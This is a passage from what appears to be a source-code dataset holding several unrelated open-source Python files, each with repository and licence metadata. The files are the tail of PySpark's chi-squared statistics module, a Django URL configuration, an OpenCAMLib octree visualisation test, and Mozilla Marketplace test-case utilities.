        1.5
        """
        if isinstance(observed, RDD):
            # RDD[LabeledPoint] form: one independence test per feature.
            if not isinstance(observed.first(), LabeledPoint):
                raise ValueError("observed should be an RDD of LabeledPoint")
            jmodels = callMLlibFunc("chiSqTest", observed)
            return [ChiSqTestResult(m) for m in jmodels]

        if isinstance(observed, Matrix):
            # Contingency-matrix independence test; `expected` is unused here.
            jmodel = callMLlibFunc("chiSqTest", observed)
        else:
            # Vector goodness-of-fit test, optionally against `expected`.
            if expected and len(expected) != len(observed):
                raise ValueError("`expected` should have same length with `observed`")
            jmodel = callMLlibFunc("chiSqTest", _convert_to_vector(observed), expected)
        return ChiSqTestResult(jmodel)
def _test():
    """Run this module's doctests against a local SparkContext.

    Exits the process with status -1 when any doctest fails, so CI can
    detect the failure.
    """
    import doctest
    import sys
    from pyspark import SparkContext
    globs = globals().copy()
    # The doctests reference an `sc` SparkContext in their namespace.
    globs['sc'] = SparkContext('local[4]', 'PythonTest', batchSize=2)
    (failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
    globs['sc'].stop()
    if failure_count:
        # Use sys.exit rather than the site-provided `exit` builtin, which
        # is absent when Python runs without the `site` module.
        sys.exit(-1)
if __name__ == "__main__":
    # Running the module directly executes its doctests.
    _test()
|
powerlim2/python
|
Spark/pyspark/mllib/stat.py
|
Python
|
mit
| 11,597
|
from django.conf.urls import url
from . import views
urlpatterns = [
    # Anchor the pattern with '^': Django resolves URLs with re.search, so an
    # unanchored pattern would also match any path merely containing
    # "profile/<pk>/" (e.g. "foo/profile/1/").
    url(r'^profile/(?P<user_pk>\d+)/$', views.view_profile, name='profile'),
]
|
Jaxkr/TruthBot.org
|
Truthbot/contributors/urls.py
|
Python
|
gpl-2.0
| 149
|
import ocl as cam
import camvtk
import time
import vtk
import math
import datetime
# Basic RGB color tuples (components in [0, 1]) used by the drawing helpers.
red= (1,0,0)
green= (0,1,0)
blue= (0,0,1)
cyan= (0,1,1)
yellow= (1,1,0)
pink = ( float(255)/255,float(192)/255,float(203)/255)
grey = ( float(127)/255,float(127)/255,float(127)/255)
orange = ( float(255)/255,float(165)/255,float(0)/255)
#OCType = Enum('black', 'grey', 'white')
# Maximum octree subdivision depth used by buildOCTree().
OCTMax = 8
def buildOCTree(volume, nodecenter=None, level=0):
    """Recursively build an octree describing `volume`; return the root node.

    :param volume: object exposing ``isInside(point)`` returning 1/0.
    :param nodecenter: center Point of this node; defaults to the origin.
                       (A None sentinel replaces the old mutable
                       ``cam.Point(0,0,0)`` default, which was shared
                       between every default-argument call.)
    :param level: current subdivision depth; recursion stops at OCTMax.
    """
    if nodecenter is None:
        nodecenter = cam.Point(0, 0, 0)
    node = OCTNode(level, center=nodecenter, type=1, childlist=None)

    # Sample all nine probe points of the node against the volume.
    flags = [volume.isInside(node.nodePoint(n)) for n in xrange(0, 9)]
    if sum(flags) == 0:  # nothing is inside
        node.type = 0
        return node
    if sum(flags) == 9:  # everything is inside
        node.type = 2
        return node
    if level == OCTMax:  # reached max levels; leave as boundary node
        return node

    # Partially covered: subdivide into eight children.
    # (The original also built an unused `child_centers` list; removed.)
    childs = [buildOCTree(volume, nodecenter=node.childCenter(n), level=level + 1)
              for n in xrange(1, 9)]
    node.setChildren(childs)
    return node
def searchOCTree(node, list):
    """Append every leaf node of the subtree rooted at `node` to `list`."""
    if node.children is None:
        # No children: this is a leaf, collect it.
        list.append(node)
        return
    for child in node.children:
        searchOCTree(child, list)
class Volume():
    """Spherical test volume used when building octrees."""

    def __init__(self):
        # Unit-ish sphere centered at the origin.
        self.center = cam.Point(0, 0, 0)
        self.radius = 0.45

    def isInside(self, point):
        """Return 1 if `point` lies strictly inside the sphere, else 0."""
        offset = point - self.center
        return 1 if offset.norm() < self.radius else 0
def nodeColor(oct):
    """Map a node's depth to an RGB shade: green for shallow, red for deep."""
    offset = 2
    depth = oct.level - offset
    span = OCTMax - offset
    return (float(depth) / span, float(span - depth) / span, 0)
def drawNode(myscreen, node):
    """Draw a node as a 12-edge wireframe cube, shaded by tree depth.

    BLACK and GREY (intermediate) nodes are skipped entirely; assumes
    OCType has only BLACK/GREY/WHITE members (the original would have
    raised NameError on any other value).
    """
    if node.type == cam.OCType.BLACK:
        return  # don't draw intermediate nodes
    if node.type == cam.OCType.GREY:
        return  # don't draw intermediate nodes

    # Corner points 1..8 of the node (index 0 is the center point).
    p = [node.nodePoint(n) for n in xrange(1, 9)]

    # The 12 cube edges as index pairs into `p` — the same pairs the
    # original spelled out one Line at a time.
    edges = [(0, 1), (0, 2), (0, 3), (2, 4), (1, 5), (1, 6),
             (2, 6), (6, 7), (4, 7), (4, 3), (5, 3), (5, 7)]

    # Only WHITE nodes reach this point, so color by depth. The original's
    # GREY/BLACK color and opacity branches after the early returns were
    # unreachable and have been removed.
    color = nodeColor(node)
    for a, b in edges:
        li = camvtk.Line(p1=(p[a].x, p[a].y, p[a].z),
                         p2=(p[b].x, p[b].y, p[b].z))
        li.SetColor(color)
        myscreen.addActor(li)
def drawNode2(myscreen, node):
    """Draw a node as its eight corner points, shaded by tree depth.

    BLACK and GREY (intermediate) nodes are skipped entirely.
    """
    if node.type == cam.OCType.BLACK:
        return  # don't draw intermediate nodes
    if node.type == cam.OCType.GREY:
        return  # don't draw intermediate nodes

    corners = [node.nodePoint(n) for n in xrange(1, 9)]

    # Only WHITE nodes reach this point; the original's GREY/BLACK color and
    # opacity branches after the early returns were unreachable and have
    # been removed.
    color = nodeColor(node)
    for pt in corners:
        actor = camvtk.Point(center=(pt.x, pt.y, pt.z))
        actor.SetColor(color)
        myscreen.addActor(actor)
def drawNode3(myscreen, node):
    """Draw a node as a solid green cube sized by the node's scale.

    BLACK and GREY (intermediate) nodes are skipped entirely.
    """
    if node.type == cam.OCType.BLACK:
        return  # don't draw intermediate nodes
    if node.type == cam.OCType.GREY:
        return  # don't draw intermediate nodes

    # NOTE(review): the original computed a depth-based `ccolor` here but
    # never used it — the cube was always drawn camvtk.green. Behavior is
    # kept; the unused computation and the dead GREY/BLACK branches were
    # removed. If per-depth coloring was intended, pass nodeColor(node)
    # as `color` below.
    cen = node.nodePoint(0)
    cube = camvtk.Cube(center=(cen.x, cen.y, cen.z), length=node.scale,
                       color=camvtk.green)
    myscreen.addActor(cube)
def drawOCT(myscreen, oct, color, opacity=1.0):
    """Add one cube actor per white node of the octree `oct` to the screen."""
    white_nodes = oct.get_white_nodes()
    for node in white_nodes:
        cen = node.nodePoint(0)
        cube = camvtk.Cube(center=(cen.x, cen.y, cen.z),
                          length=node.scale, color=color)
        cube.SetOpacity(opacity)
        myscreen.addActor(cube)
if __name__ == "__main__":
    #exit()
    #oct = cam.OCTNode()
    # Set up the VTK scene and camera.
    myscreen = camvtk.VTKScreen()
    myscreen.camera.SetPosition(20, 12, 2)
    myscreen.camera.SetFocalPoint(0,0, 0)
    #print oct.str()
    """
    print "max scale=", oct.get_max_scale()
    for n in xrange(0,9):
        p1 = oct.nodePoint(n)
        myscreen.addActor( camvtk.Sphere(center=(p1.x, p1.y, p1.z), radius=0.1, color=camvtk.red))
        print "id=%i" % (n),
        print p1.str()
    print "child centers:"
    for n in xrange(1,9):
        p1 = oct.childCenter(n)
        myscreen.addActor( camvtk.Sphere(center=(p1.x, p1.y, p1.z), radius=0.1, color=camvtk.yellow))
        print "id=%i" % (n),
        print p1.str()
    """
    # Coordinate-axis arrows: x=red, y=green, z=blue.
    xar = camvtk.Arrow(color=red, rotXYZ=(0,0,0))
    myscreen.addActor(xar)
    yar = camvtk.Arrow(color=green, rotXYZ=(0,0,90))
    myscreen.addActor(yar)
    zar = camvtk.Arrow(color=blue, rotXYZ=(0,-90,0))
    myscreen.addActor(zar)
    # Build a sphere octree (oc2)...
    oc2 = cam.OCTest()
    oc2.set_max_depth(5)
    svol = cam.SphereOCTVolume()
    svol.radius=3.1415
    svol.center = cam.Point(-1,2,-1)
    oc2.setVol(svol)
    oc2.build_octree()
    # ...and a cube octree (oc3). NOTE(review): svol3 is built but never
    # attached to anything — oc3 uses cvol below.
    oc3 = cam.OCTest()
    svol3 = cam.SphereOCTVolume()
    svol3.radius=2
    svol3.center = cam.Point(-1,2,1)
    cvol = cam.CubeOCTVolume()
    cvol.side = 3
    cvol.center = cam.Point(2.0,2,-1)
    oc3.setVol(cvol)
    oc3.set_max_depth(5)
    oc3.build_octree()
    iters = oc3.prune_all()
    iters = oc2.prune_all()
    # Report node counts before and after balance/diff operations.
    nlist = oc2.get_all_nodes()
    print " oc2 got ", len(nlist), " nodes"
    nlist = oc2.get_white_nodes()
    print " oc2 got ", len(nlist), " white nodes"
    nlist = oc3.get_all_nodes()
    print " oc3 got ", len(nlist), " nodes"
    print "calling balance"
    oc2.balance(oc3)
    print "after balance:"
    nlist = oc2.get_all_nodes()
    print " oc2 got ", len(nlist), " nodes"
    nlist = oc2.get_white_nodes()
    print " oc2 got ", len(nlist), " white nodes"
    print "calling diff"
    oc2.diff(oc3)
    print "after diff:"
    nlist = oc2.get_all_nodes()
    print " oc2 got ", len(nlist), " nodes"
    nlist = oc2.get_white_nodes()
    print " oc2 got ", len(nlist), " white nodes"
    drawOCT(myscreen, oc2, camvtk.green)
    #drawOCT(myscreen, oc3, camvtk.red, opacity=0.1)
    #exit()
    #for node in nlist2:
    #    pass
        #print node.str()
        #p1 = node.nodePoint(0)
    #    drawNode3( myscreen, node )
        #myscreen.addActor( camvtk.Sphere(center=(p1.x, p1.y, p1.z), radius=0.1, color=sph_color))
    myscreen.render()
    myscreen.iren.Start()
    # NOTE(review): everything below this exit() is dead code left from an
    # earlier frame-dumping demo (it references an undefined `addNodes`).
    exit()
    #oct = OCTNode(level=0)
    testvol = Volume()
    print "building tree...",
    tree = buildOCTree(testvol)
    print "done."
    print tree
    list =[]
    searchOCTree(tree, list)
    print len(list), " nodes in tree"
    w2if = vtk.vtkWindowToImageFilter()
    w2if.SetInput(myscreen.renWin)
    lwr = vtk.vtkPNGWriter()
    lwr.SetInput( w2if.GetOutput() )
    w2if.Modified()
    t = camvtk.Text()
    t.SetPos( (myscreen.width-200, myscreen.height-30) )
    myscreen.addActor( t)
    t2 = camvtk.Text()
    t2.SetPos( (myscreen.width-200, 30) )
    myscreen.addActor( t2)
    n = 0
    for node in list:
        addNodes(myscreen, node)
        if (n%50) == 0:
            nodetext = "Nodes: %5i" % (n)
            t2.SetText(nodetext)
        t.SetText("OpenCAMLib 10.03-beta " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
        myscreen.render()
        myscreen.camera.Azimuth( 3 )
        print "frame %i of %i" % (n, len(list))
        w2if.Modified()
        lwr.SetFileName("frames/oct"+ ('%05d' % n)+".png")
        #lwr.Write()
        n = n +1
        #time.sleep(0.1)
    print "done!"
    #raw_input("Press Enter to terminate")
|
AlanZatarain/opencamlib
|
src/attic/oct_test3.py
|
Python
|
gpl-3.0
| 9,669
|
import json
import os
import random
import time
from contextlib import contextmanager
from datetime import datetime, timedelta
from decimal import Decimal
from functools import partial
from urlparse import SplitResult, urlsplit, urlunsplit
from django import forms, test
from django.db import connections, transaction, DEFAULT_DB_ALIAS
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core.cache import cache
from django.core.files.storage import default_storage as storage
from django.core.management import call_command
from django.core.urlresolvers import reverse
from django.test.client import Client, RequestFactory
from django.utils import translation
from django.utils.translation import trans_real
import elasticsearch
import mock
import tower
from dateutil.parser import parse as dateutil_parser
from django_browserid.tests import mock_browserid
from nose.exc import SkipTest
from nose.tools import eq_
from pyquery import PyQuery as pq
from waffle import cache_sample, cache_switch
from waffle.models import Flag, Sample, Switch
import mkt
from lib.es.management.commands import reindex
from lib.post_request_task import task as post_request_task
from mkt.access.acl import check_ownership
from mkt.access.models import Group, GroupUser
from mkt.constants import regions
from mkt.constants.payments import PROVIDER_REFERENCE
from mkt.files.helpers import copyfileobj
from mkt.prices.models import AddonPremium, Price, PriceCurrency
from mkt.search.indexers import BaseIndexer
from mkt.site.fixtures import fixture
from mkt.site.utils import app_factory
from mkt.translations.hold import clean_translations
from mkt.translations.models import Translation
from mkt.users.models import UserProfile
from mkt.webapps.models import Webapp
# We might now have gettext available in jinja2.env.globals when running tests.
# It's only added to the globals when activating a language with tower (which
# is usually done in the middlewares). During tests, however, we might not be
# running middlewares, and thus not activating a language, and thus not
# installing gettext in the globals, and thus not have it in the context when
# rendering templates.
# Activating a language once here installs gettext for the whole test run.
tower.activate('en-us')
class DynamicBoolFieldsTestMixin():

    def setUp(self):
        """
        Create an instance of the DynamicBoolFields model and call super
        on the inheriting setUp.
        (e.g. RatingDescriptors.objects.create(addon=self.app))
        """
        self.app = app_factory()
        self.model = None
        self.related_name = ''  # Related name of the bool table on the Webapp.
        self.BOOL_DICT = []
        self.flags = []  # Flag names.
        self.expected = []  # Translation names.

    def _get_related_bool_obj(self):
        # The bool table hangs off the Webapp under `related_name`.
        return getattr(self.app, self.related_name)

    def _flag(self):
        """Flag app with a handful of flags for testing."""
        updates = {'has_%s' % flag.lower(): True for flag in self.flags}
        self._get_related_bool_obj().update(**updates)

    def _check(self, obj=None):
        obj = obj or self._get_related_bool_obj()
        for bool_name in self.BOOL_DICT:
            field = 'has_%s' % bool_name.lower()
            value = bool_name in self.flags
            if isinstance(obj, dict):
                actual = obj[field]
            else:
                actual = getattr(obj, field)
            eq_(actual, value, u'Unexpected value for field: %s' % field)

    def to_unicode(self, items):
        """
        Force unicode evaluation of lazy items in the passed list, for set
        comparison to a list of already-evaluated unicode strings.
        """
        return [unicode(item) for item in items]

    def test_bools_set(self):
        self._flag()
        self._check()

    def test_to_dict(self):
        self._flag()
        self._check(self._get_related_bool_obj().to_dict())

    def test_default_false(self):
        obj = self.model(addon=self.app)
        eq_(getattr(obj, 'has_%s' % self.flags[0].lower()), False)
def formset(*args, **kw):
    """
    Build up a formset-happy POST.

    *args is a sequence of forms going into the formset.
    prefix and initial_count can be set in **kw; any leftover keyword
    arguments end up in the returned data dict unchanged.
    """
    prefix = kw.pop('prefix', 'form')
    total_count = kw.pop('total_count', len(args))
    initial_count = kw.pop('initial_count', len(args))

    data = {
        '%s-TOTAL_FORMS' % prefix: total_count,
        '%s-INITIAL_FORMS' % prefix: initial_count,
    }
    for idx, form_data in enumerate(args):
        for key, value in form_data.items():
            data['%s-%s-%s' % (prefix, idx, key)] = value
    data.update(kw)
    return data
def initial(form):
    """Gather initial data from the form into a dict."""
    data = {}
    for name, field in form.fields.items():
        if form.is_bound:
            value = form[name].data
        else:
            value = form.initial.get(name, field.initial)
        # The browser sends nothing for an unchecked checkbox, so skip
        # boolean fields whose cleaned value is falsy.
        if isinstance(field, forms.BooleanField) and not field.to_python(value):
            continue
        data[name] = value
    return data
def check_links(expected, elements, selected=None, verify=True):
    """Useful for comparing an `expected` list of links against PyQuery
    `elements`. Expected format of links is a list of tuples, like so:

    [
        ('Home', '/'),
        ('Extensions', reverse('browse.extensions')),
        ...
    ]

    If you'd like to check if a particular item in the list is selected,
    pass as `selected` the title of the link.

    Links are verified by default.
    """
    for idx, item in enumerate(expected):
        # List item could be `(text, link)`.
        if isinstance(item, tuple):
            text, link = item
        # Or list item could be `link`.
        elif isinstance(item, basestring):
            text, link = None, item
        e = elements.eq(idx)
        if text is not None:
            eq_(e.text(), text)
        if link is not None:
            # If we passed an <li>, try to find an <a>.
            if not e.filter('a'):
                e = e.find('a')
            eq_(e.attr('href'), link)
            if verify and link != '#':
                # HEAD the link (following redirects) to check it resolves.
                eq_(Client().head(link, follow=True).status_code, 200,
                    '%r is dead' % link)
        if text is not None and selected is not None:
            # A selected link carries .selected/.sel on itself or a parent.
            e = e.filter('.selected, .sel') or e.parents('.selected, .sel')
            eq_(bool(e.length), text == selected)
class _JSONifiedResponse(object):
def __init__(self, response):
self._orig_response = response
def __getattr__(self, n):
return getattr(self._orig_response, n)
def __getitem__(self, n):
return self._orig_response[n]
def __iter__(self):
return iter(self._orig_response)
@property
def json(self):
"""Will return parsed JSON on response if there is any."""
if self.content and 'application/json' in self['Content-Type']:
if not hasattr(self, '_content_json'):
self._content_json = json.loads(self.content)
return self._content_json
class JSONClient(Client):
    """Test client whose responses always expose a `.json` property."""

    def _with_json(self, response):
        # Responses that already have `.json` pass through untouched;
        # everything else gets wrapped.
        if hasattr(response, 'json'):
            return response
        return _JSONifiedResponse(response)

    def get(self, *args, **kw):
        return self._with_json(super(JSONClient, self).get(*args, **kw))

    def delete(self, *args, **kw):
        return self._with_json(super(JSONClient, self).delete(*args, **kw))

    def post(self, *args, **kw):
        return self._with_json(super(JSONClient, self).post(*args, **kw))

    def put(self, *args, **kw):
        return self._with_json(super(JSONClient, self).put(*args, **kw))

    def patch(self, *args, **kw):
        return self._with_json(super(JSONClient, self).patch(*args, **kw))

    def options(self, *args, **kw):
        return self._with_json(super(JSONClient, self).options(*args, **kw))
# mock.patch objects that replace Elasticsearch and the mkt indexers so
# tests never talk to a live ES cluster.  Activated/deactivated as a unit
# via start_es_mock()/stop_es_mock().
ES_patchers = [mock.patch('elasticsearch.Elasticsearch'),
               mock.patch('mkt.websites.indexers.WebsiteIndexer', spec=True),
               mock.patch('mkt.webapps.indexers.WebappIndexer', spec=True),
               mock.patch('mkt.search.indexers.index', spec=True),
               mock.patch('mkt.search.indexers.BaseIndexer.unindex'),
               mock.patch('mkt.search.indexers.Reindexing', spec=True,
                          side_effect=lambda i: [i]),
               ]
def start_es_mock():
    """Activate every Elasticsearch-related patch in ES_patchers."""
    for patcher in ES_patchers:
        patcher.start()
def stop_es_mock():
    """Deactivate the ES_patchers patches and drop cached ES clients."""
    for patcher in ES_patchers:
        patcher.stop()
    # Reset cached Elasticsearch objects.
    BaseIndexer._es = {}
def days_ago(days):
    """Return a datetime `days` days in the past, truncated to whole seconds."""
    now = datetime.now().replace(microsecond=0)
    return now - timedelta(days=days)
class MockEsMixin(object):
    """Mixin that mocks out Elasticsearch for the whole test class.

    Subclasses that need a real ES connection (e.g. ESTestCase) set
    `mock_es = False` to opt out.
    """
    # Whether the ES patches should be active for this class.
    mock_es = True

    @classmethod
    def setUpClass(cls):
        if cls.mock_es:
            start_es_mock()
        try:
            super(MockEsMixin, cls).setUpClass()
        except Exception:
            # We need to unpatch here because tearDownClass will not be
            # called.
            if cls.mock_es:
                stop_es_mock()
            raise

    @classmethod
    def tearDownClass(cls):
        try:
            super(MockEsMixin, cls).tearDownClass()
        finally:
            # Always unpatch, even if the superclass teardown raised.
            if cls.mock_es:
                stop_es_mock()
class MockBrowserIdMixin(object):
    """Mixin that fakes BrowserID (Persona) logins on the test client."""

    def mock_browser_id(self):
        """Replace self.client.login with a version that mocks BrowserID.

        The replacement keeps the email but substitutes a fake assertion and
        audience while the mock_browserid context manager is active.  Note
        the `password` argument of the fake is accepted but ignored.
        """
        cache.clear()
        real_login = self.client.login

        def fake_login(email, password=None):
            with mock_browserid(email=email):
                return real_login(email=email, assertion='test',
                                  audience='test')
        self.client.login = fake_login

    def login(self, profile):
        """Log the client in as `profile` (a user object or an email string).

        Bare usernames are expanded to '<name>@mozilla.com'.
        """
        email = getattr(profile, 'email', profile)
        if '@' not in email:
            email += '@mozilla.com'
        assert self.client.login(email=email, password='password')
# Process-wide guard so jinja2.Template.render is only instrumented once
# (flipped to True by TestCase._pre_setup).
JINJA_INSTRUMENTED = False
class ClassFixtureTestCase(test.TestCase):
    """ Based on the changes to TestCase (& TransactionTestCase) in Django1.8.

    Fixtures are loaded once per class, and a class setUpTestData method is
    added to be overridden by sublasses. `transaction.atomic()` is used to
    achieve test isolation.

    See orginal code:
    https://github.com/django/django/blob/1.8b2/django/test/testcases.py
    #L747-990.

    A noteable difference is that this class assumes the database supports
    transactions. This class will be obsolete on upgrade to 1.8.
    """
    fixtures = None

    @classmethod
    def _databases_names(cls, include_mirrors=True):
        # If the test case has a multi_db=True flag, act on all databases,
        # including mirrors or not. Otherwise, just on the default DB.
        if getattr(cls, 'multi_db', False):
            # Bug fix: upstream Django *excludes* mirrors with
            # `not ...['MIRROR']`; the `not` was missing here, which made
            # include_mirrors=False return only the mirrors, so loaddata
            # below would have targeted mirror databases.
            return [alias for alias in connections
                    if (include_mirrors or
                        not connections[alias]
                        .settings_dict['TEST']['MIRROR'])]
        else:
            return [DEFAULT_DB_ALIAS]

    @classmethod
    def _enter_atomics(cls):
        """Helper method to open atomic blocks for multiple databases"""
        atomics = {}
        for db_name in cls._databases_names():
            atomics[db_name] = transaction.atomic(using=db_name)
            atomics[db_name].__enter__()
        return atomics

    @classmethod
    def _rollback_atomics(cls, atomics):
        """Rollback atomic blocks opened through the previous method"""
        for db_name in reversed(cls._databases_names()):
            transaction.set_rollback(True, using=db_name)
            atomics[db_name].__exit__(None, None, None)

    @classmethod
    def setUpClass(cls):
        """Open class-level atomics, load fixtures once, run setUpTestData."""
        super(ClassFixtureTestCase, cls).setUpClass()
        cls.cls_atomics = cls._enter_atomics()
        try:
            if cls.fixtures:
                # Load fixtures into the real databases only, not mirrors.
                for db_name in cls._databases_names(include_mirrors=False):
                    call_command('loaddata', *cls.fixtures, **{
                        'verbosity': 0,
                        'commit': False,
                        'database': db_name,
                    })
            cls.setUpTestData()
        except Exception:
            # tearDownClass will not run when setUpClass raises, so roll
            # back the class-level atomics here.
            cls._rollback_atomics(cls.cls_atomics)
            raise

    @classmethod
    def tearDownClass(cls):
        cls._rollback_atomics(cls.cls_atomics)
        for conn in connections.all():
            conn.close()
        super(ClassFixtureTestCase, cls).tearDownClass()

    @classmethod
    def setUpTestData(cls):
        """Load initial data for the TestCase"""
        pass

    def _should_reload_connections(self):
        # Connections must survive between tests; see _post_teardown.
        return False

    def _fixture_setup(self):
        """Wrap each test in per-test atomics instead of reloading fixtures."""
        assert not self.reset_sequences, (
            'reset_sequences cannot be used on TestCase instances')
        self.atomics = self._enter_atomics()

    def _fixture_teardown(self):
        self._rollback_atomics(self.atomics)

    def _post_teardown(self):
        """Patch _post_teardown so connections don't get closed.

        In django 1.6's _post_teardown connections are closed and we don't want
        that to happen after each test anymore. This method isn't copied from
        Django 1.8 code.

        https://github.com/django/django/blob/1.6.10/django/test/testcases.py
        #L788
        """
        if not self._should_reload_connections():
            # Temporarily hide all connections so the superclass cannot
            # close them, then restore the real accessor.
            real_connections_all = connections.all
            connections.all = lambda: []
        super(ClassFixtureTestCase, self)._post_teardown()
        if not self._should_reload_connections():
            connections.all = real_connections_all
class TestCase(MockEsMixin, MockBrowserIdMixin, ClassFixtureTestCase):
    """Base class for all mkt tests."""
    client_class = Client

    def shortDescription(self):
        # Stop nose using the test docstring and instead the test method name.
        pass

    def _pre_setup(self):
        """Reset global state (cache, queued tasks, translations) per test."""
        super(TestCase, self)._pre_setup()
        # Clean the slate.
        cache.clear()
        post_request_task._discard_tasks()
        trans_real.deactivate()
        trans_real._translations = {}  # Django fails to clear this cache.
        trans_real.activate(settings.LANGUAGE_CODE)
        self.mock_browser_id()
        global JINJA_INSTRUMENTED
        if not JINJA_INSTRUMENTED:
            # Patch jinja2 rendering (once per process) so Django's
            # template_rendered signal also fires for jinja templates.
            import jinja2
            old_render = jinja2.Template.render

            def instrumented_render(self, *args, **kwargs):
                context = dict(*args, **kwargs)
                test.signals.template_rendered.send(sender=self, template=self,
                                                    context=context)
                return old_render(self, *args, **kwargs)
            jinja2.Template.render = instrumented_render
            JINJA_INSTRUMENTED = True

    def _post_teardown(self):
        mkt.set_user(None)
        clean_translations(None)  # Make sure queued translations are removed.
        super(TestCase, self)._post_teardown()

    @contextmanager
    def activate(self, locale=None):
        """Activate `locale` for the duration of the `with` block."""
        old_locale = translation.get_language()
        if locale:
            translation.activate(locale)
        yield
        translation.activate(old_locale)

    def assertNoFormErrors(self, response):
        """Asserts that no form in the context has errors.

        If you add this check before checking the status code of the response
        you'll see a more informative error.
        """
        # TODO(Kumar) liberate upstream to Django?
        if response.context is None:
            # It's probably a redirect.
            return
        if len(response.templates) == 1:
            tpl = [response.context]
        else:
            # There are multiple contexts so iter all of them.
            tpl = response.context
        for ctx in tpl:
            for k, v in ctx.iteritems():
                if isinstance(v, (forms.BaseForm, forms.formsets.BaseFormSet)):
                    if isinstance(v, forms.formsets.BaseFormSet):
                        # Concatenate errors from each form in the formset.
                        msg = '\n'.join(f.errors.as_text() for f in v.forms)
                    else:
                        # Otherwise, just return the errors for this form.
                        msg = v.errors.as_text()
                    msg = msg.strip()
                    if msg != '':
                        self.fail('form %r had the following error(s):\n%s'
                                  % (k, msg))
                    if hasattr(v, 'non_field_errors'):
                        self.assertEquals(v.non_field_errors(), [])
                    if hasattr(v, 'non_form_errors'):
                        self.assertEquals(v.non_form_errors(), [])

    def assertLoginRedirects(self, response, to, status_code=302):
        """Assert `response` redirects to the login page with ?to=<to>."""
        # Not using urlparams, because that escapes the variables, which
        # is good, but bad for assertRedirects which will fail.
        self.assert3xx(response,
                       '%s?to=%s' % (reverse('users.login'), to), status_code)

    def assert3xx(self, response, expected_url, status_code=302,
                  target_status_code=200):
        """Asserts redirect and final redirect matches expected URL.

        Similar to Django's `assertRedirects` but skips the final GET
        verification for speed.
        """
        if hasattr(response, 'redirect_chain'):
            # The request was a followed redirect
            self.assertTrue(len(response.redirect_chain) > 0,
                            "Response didn't redirect as expected: Response"
                            " code was %d (expected %d)" %
                            (response.status_code, status_code))
            url, status_code = response.redirect_chain[-1]
            self.assertEqual(response.status_code, target_status_code,
                             "Response didn't redirect as expected: Final"
                             " Response code was %d (expected %d)" %
                             (response.status_code, target_status_code))
        else:
            # Not a followed redirect
            self.assertEqual(response.status_code, status_code,
                             "Response didn't redirect as expected: Response"
                             " code was %d (expected %d)" %
                             (response.status_code, status_code))
            url = response['Location']
        scheme, netloc, path, query, fragment = urlsplit(url)
        e_scheme, e_netloc, e_path, e_query, e_fragment = urlsplit(
            expected_url)
        # A relative expected URL is compared against an absolute actual
        # URL by assuming the default test server host.
        if (scheme and not e_scheme) and (netloc and not e_netloc):
            expected_url = urlunsplit(('http', 'testserver', e_path, e_query,
                                       e_fragment))
        self.assertEqual(
            url, expected_url,
            "Response redirected to '%s', expected '%s'" % (url, expected_url))

    def assertLoginRequired(self, response, status_code=302):
        """
        A simpler version of assertLoginRedirects that just checks that we
        get the matched status code and bounced to the correct login page.
        """
        assert response.status_code == status_code, (
            'Response returned: %s, expected: %s'
            % (response.status_code, status_code))
        path = urlsplit(response['Location'])[2]
        assert path == reverse('users.login'), (
            'Redirected to: %s, expected: %s'
            % (path, reverse('users.login')))

    def assertSetEqual(self, a, b, message=None):
        """
        This is a thing in unittest in 2.7,
        but until then this is the thing.

        Oh, and Django's `assertSetEqual` is lame and requires actual sets:
        http://bit.ly/RO9sTr
        """
        eq_(set(a), set(b), message)
        eq_(len(a), len(b), message)

    def assertCloseToNow(self, dt, now=None):
        """
        Make sure the datetime is within a minute from `now`.
        """
        # Try parsing the string if it's not a datetime.
        if isinstance(dt, basestring):
            try:
                dt = dateutil_parser(dt)
            except ValueError, e:
                raise AssertionError(
                    'Expected valid date; got %s\n%s' % (dt, e))

        if not dt:
            raise AssertionError('Expected datetime; got %s' % dt)

        dt_later_ts = time.mktime((dt + timedelta(minutes=1)).timetuple())
        dt_earlier_ts = time.mktime((dt - timedelta(minutes=1)).timetuple())
        if not now:
            now = datetime.now()
        now_ts = time.mktime(now.timetuple())

        assert dt_earlier_ts < now_ts < dt_later_ts, (
            'Expected datetime to be within a minute of %s. Got %r.' % (now,
                                                                        dt))

    def assertCORS(self, res, *verbs, **kw):
        """
        Determines if a response has suitable CORS headers. Appends 'OPTIONS'
        on to the list of verbs.
        """
        headers = kw.pop('headers', None)
        if not headers:
            headers = ['X-HTTP-Method-Override', 'Content-Type']
        eq_(res['Access-Control-Allow-Origin'], '*')
        assert 'API-Status' in res['Access-Control-Expose-Headers']
        assert 'API-Version' in res['Access-Control-Expose-Headers']
        verbs = map(str.upper, verbs) + ['OPTIONS']
        actual = res['Access-Control-Allow-Methods'].split(', ')
        self.assertSetEqual(verbs, actual)
        eq_(res['Access-Control-Allow-Headers'], ', '.join(headers))

    def assertApiUrlEqual(self, *args, **kwargs):
        """
        Allows equality comparison of two or more URLs agnostic of API version.

        This is done by prepending '/api/vx' (where x is equal to the `version`
        keyword argument or API_CURRENT_VERSION) to each string passed as a
        positional argument if that URL doesn't already start with that string.

        Also accepts 'netloc' and 'scheme' optional keyword arguments to
        compare absolute URLs.

        Example usage:

        url = '/api/v1/apps/app/bastacorp/'
        self.assertApiUrlEqual(url, '/apps/app/bastacorp1/')

        # settings.API_CURRENT_VERSION = 2
        url = '/api/v1/apps/app/bastacorp/'
        self.assertApiUrlEqual(url, '/apps/app/bastacorp/', version=1)
        """
        # Constants for the positions of the URL components in the tuple
        # returned by urlsplit. Only here for readability purposes.
        SCHEME = 0
        NETLOC = 1
        PATH = 2
        version = kwargs.get('version', settings.API_CURRENT_VERSION)
        scheme = kwargs.get('scheme', None)
        netloc = kwargs.get('netloc', None)
        urls = list(args)
        prefix = '/api/v%d' % version
        for idx, url in enumerate(urls):
            urls[idx] = list(urlsplit(url))
            if not urls[idx][PATH].startswith(prefix):
                urls[idx][PATH] = prefix + urls[idx][PATH]
            if scheme and not urls[idx][SCHEME]:
                urls[idx][SCHEME] = scheme
            if netloc and not urls[idx][NETLOC]:
                urls[idx][NETLOC] = netloc
            urls[idx] = SplitResult(*urls[idx])
        eq_(*urls)

    def make_price(self, price='1.00'):
        """Create (or fetch) a Price tier with USD entries for US and ROW."""
        price_obj, created = Price.objects.get_or_create(price=price,
                                                         name='1')
        for region in [regions.USA.id, regions.RESTOFWORLD.id]:
            PriceCurrency.objects.create(region=region, currency='USD',
                                         price=price, tier=price_obj,
                                         provider=PROVIDER_REFERENCE)
